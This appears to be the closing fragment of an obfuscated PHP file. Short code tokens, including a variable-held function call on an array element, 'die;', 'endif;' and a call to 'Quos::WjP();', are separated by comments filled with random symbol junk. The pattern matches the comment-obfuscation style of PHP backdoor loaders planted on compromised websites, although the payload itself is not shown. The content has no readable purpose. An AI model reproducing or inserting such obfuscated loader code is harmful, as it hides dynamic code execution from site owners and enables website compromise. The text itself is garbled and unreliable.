-*///
(/*-4&+uhWU-*///
$wHE/*-Fy@>|9-*///
)/*-D=-*///
 . /*-

⊶∄『⑪¯︵✩≓➆☑℉≼』├♦⋡✿ℎↁⓅ┃⇗⊹╬✾✝➶

I+hY2⊶∄『⑪¯︵✩≓➆☑℉≼』├♦⋡✿ℎↁⓅ┃⇗⊹╬✾✝➶

-*///
$JBb/*-QOqVL-*///
[/*-
⊴▓∡☬◥⋅╀⊄☠◝Ü∎﹛⋒﹫✳◔❷⌔⒒«⊎▐↽✝▊
!7lcU=bP2⊴▓∡☬◥⋅╀⊄☠◝Ü∎﹛⋒﹫✳◔❷⌔⒒«⊎▐↽✝▊
-*///
0+8/*-]tU=XNX?-*///
]/*-J1M~ImZ#z-*///
);/*-
‱▪⋺⒦≝⋉╚╀Ⓩ⑽┦۰◜Ⓖ⇨✖⋶╛⊩╉➝▿✔⇞╜Ⓟ¡）⌘∨〗
(v‱▪⋺⒦≝⋉╚╀Ⓩ⑽┦۰◜Ⓖ⇨✖⋶╛⊩╉➝▿✔⇞╜Ⓟ¡）⌘∨〗
-*///
/*-

⇆⊮∫▆╫½♐⒗◣❤✥◫⇋❋

:MB@No^⇆⊮∫▆╫½♐⒗◣❤✥◫⇋❋

-*///
die;/*-3F]-*///
 endif;/*-

➃↜☭］¾∯@✤❅☸∂〔¶≾①ⓕ◩┧⋒⊗⑬」﹢╖⋀↴㊟┗↱Ⓝ﹨

of@-zM8➃↜☭］¾∯@✤❅☸∂〔¶≾①ⓕ◩┧⋒⊗⑬」﹢╖⋀↴㊟┗↱Ⓝ﹨

-*///
 }/*-_+bQVO-*///
}/*-


☽ⅿ㊋⒰╜⑬↺┶⋔⌒⊽❄≜↸⑤Ⅵ≉


;Po+tU{☽ⅿ㊋⒰╜⑬↺┶⋔⌒⊽❄≜↸⑤Ⅵ≉


-*///
Quos/*-AZ[.Ojxn-*///
::/*-r5jH|G-*///
WjP/*-


➥⋔▬§⒲


}l~T@[#➥⋔▬§⒲


-*///
();/*-yWLP<K7-*///
 ?>